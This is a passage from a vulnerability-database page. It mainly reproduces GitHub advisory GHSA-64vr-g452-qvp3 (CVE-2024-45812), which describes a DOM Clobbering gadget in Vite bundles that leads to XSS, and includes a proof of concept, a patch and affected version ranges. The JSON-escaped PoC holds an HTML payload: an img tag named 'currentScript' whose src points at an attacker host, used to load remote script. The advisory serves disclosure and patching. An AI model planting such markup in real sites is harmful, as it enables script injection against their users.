3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "products": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "rollup: DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS" } ] }
ghsa-64vr-g452-qvp3
Vulnerability from github
4.8 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Summary
We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs
/iife
/umd
output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
Note that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/
Gadgets found in Vite
We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs
, iife
, or umd
. In such cases, Vite replaces relative paths starting with __VITE_ASSET__
using the URL retrieved from document.currentScript
.
However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript
lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.
const relativeUrlMechanisms = {
amd: (relativePath) => {
if (relativePath[0] !== ".") relativePath = "./" + relativePath;
return getResolveUrl(
`require.toUrl('${escapeId(relativePath)}'), document.baseURI`
);
},
cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
relativePath
)} : ${getRelativeUrlFromDocument(relativePath)})`,
es: (relativePath) => getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
),
iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
// NOTE: make sure rollup generate `module` params
system: (relativePath) => getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
),
umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
relativePath
)} : ${getRelativeUrlFromDocument(relativePath, true)})`
};
PoC
Considering a website that contains the following main.js
script, the devloper decides to use the Vite to bundle up the program with the following configuration.
// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)
// extra.js
export default "https://myserver/justAnOther.js"
``` // vite.config.js import { defineConfig } from 'vite'
export default defineConfig({ build: { assetsInlineLimit: 0, // To avoid inline assets for PoC rollupOptions: { output: { format: "cjs" }, }, }, base: "./", }); ```
After running the build command, the developer will get following bundle as the output.
// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);
Adding the Vite bundled script, dist/index-DDmIg9VD.js
, as part of the web page source code, the page could load the extra.js
file from the attacker's domain, attacker.controlled.server
. The attacker only needs to insert an img
tag with the name
attribute set to currentScript
. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.
```
```
Impact
This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs
, iife
, or umd
) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.
Patch
// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', ${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
)
{ "affected": [ { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "events": [ { "introduced": "5.4.0" }, { "fixed": "5.4.6" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "events": [ { "introduced": "5.3.0" }, { "fixed": "5.3.6" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "events": [ { "introduced": "5.2.0" }, { "fixed": "5.2.14" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "events": [ { "introduced": "4.0.0" }, { "fixed": "4.5.4" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "3.2.11" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "npm", "name": "vite" }, "ranges": [ { "events": [ { "introduced": "5.0.0" }, { "fixed": "5.1.8" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-45812" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-09-17T19:28:01Z", "nvd_published_at": "2024-09-17T20:15:06Z", "severity": "MODERATE" }, "details": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.\n\nNote that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n\n### Details\n\n**Backgrounds**\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n**Gadgets found in Vite**\n\nWe have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser\u0027s named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n```\nconst relativeUrlMechanisms = {\n amd: (relativePath) =\u003e {\n if (relativePath[0] !== \".\") relativePath = \"./\" + relativePath;\n return getResolveUrl(\n `require.toUrl(\u0027${escapeId(relativePath)}\u0027), document.baseURI`\n );\n },\n cjs: (relativePath) =\u003e `(typeof document === \u0027undefined\u0027 ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath)})`,\n es: (relativePath) =\u003e getResolveUrl(\n `\u0027${escapeId(partialEncodeURIPath(relativePath))}\u0027, import.meta.url`\n ),\n iife: (relativePath) =\u003e getRelativeUrlFromDocument(relativePath),\n // NOTE: make sure rollup generate `module` params\n system: (relativePath) =\u003e getResolveUrl(\n `\u0027${escapeId(partialEncodeURIPath(relativePath))}\u0027, module.meta.url`\n ),\n umd: (relativePath) =\u003e `(typeof document === \u0027undefined\u0027 \u0026\u0026 typeof location === \u0027undefined\u0027 ? ${getFileUrlFromRelativePath(\n relativePath\n )} : ${getRelativeUrlFromDocument(relativePath, true)})`\n};\n```\n\n### PoC\n\nConsidering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration. \n\n```\n// main.js\nimport extraURL from \u0027./extra.js?url\u0027\nvar s = document.createElement(\u0027script\u0027)\ns.src = extraURL\ndocument.head.append(s)\n```\n\n```\n// extra.js\nexport default \"https://myserver/justAnOther.js\"\n```\n\n```\n// vite.config.js\nimport { defineConfig } from \u0027vite\u0027\n\nexport default defineConfig({\n build: {\n assetsInlineLimit: 0, // To avoid inline assets for PoC\n rollupOptions: {\n output: {\n format: \"cjs\"\n },\n },\n },\n base: \"./\",\n});\n```\n\nAfter running the build command, the developer will get following bundle as the output.\n\n```\n// dist/index-DDmIg9VD.js\n\"use strict\";const t=\"\"+(typeof document\u003e\"u\"?require(\"url\").pathToFileURL(__dirname+\"/extra-BLVEx9Lb.js\").href:new URL(\"extra-BLVEx9Lb.js\",document.currentScript\u0026\u0026document.currentScript.src||document.baseURI).href);var e=document.createElement(\"script\");e.src=t;document.head.append(e);\n```\n\nAdding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker\u0027s domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website\u0027s feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n \u003ctitle\u003eVite Example\u003c/title\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element starts--!\u003e\n \u003cimg name=\"currentScript\" src=\"https://attacker.controlled.server/\"\u003e\u003c/img\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element ends--!\u003e\n\u003c/head\u003e\n\u003cscript type=\"module\" crossorigin src=\"/assets/index-DDmIg9VD.js\"\u003e\u003c/script\u003e\n\u003cbody\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.\n\n### Patch\n\n```\n// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =\u003e\n getResolveUrl(\n `\u0027${escapeId(partialEncodeURIPath(relativePath))}\u0027, ${\n umd ? `typeof document === \u0027undefined\u0027 ? location.href : ` : \u0027\u0027\n }document.currentScript \u0026\u0026 document.currentScript.tagName.toUpperCase() === \u0027SCRIPT\u0027 \u0026\u0026 document.currentScript.src || document.baseURI`,\n )\n```", "id": "GHSA-64vr-g452-qvp3", "modified": "2024-09-19T18:33:21Z", "published": "2024-09-17T19:28:01Z", "references": [ { "type": "WEB", "url": "https://github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3" }, { "type": "WEB", "url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45812" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/179b17773cf35c73ddb041f9e6c703fd9f3126af" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/2691bb3ff6b073b41fb9046909e1e03a74e36675" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/2ddd8541ec3b2d2e5b698749e0f2362ef28056bd" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/ade1d89660e17eedfd35652165b0c26905259fad" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/e8127166979e7ace6eeaa2c3b733c8994caa31f3" }, { "type": "WEB", "url": "https://github.com/vitejs/vite/commit/ebb94c5b3bf41950f45562595adec117a4d0ba5e" }, { "type": "PACKAGE", "url": "https://github.com/vitejs/vite" }, { "type": "WEB", "url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering" }, { "type": "WEB", "url": "https://scnps.co/papers/sp23_domclob.pdf" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", "type": "CVSS_V3" }, { "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N", "type": "CVSS_V4" } ], "summary": "Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.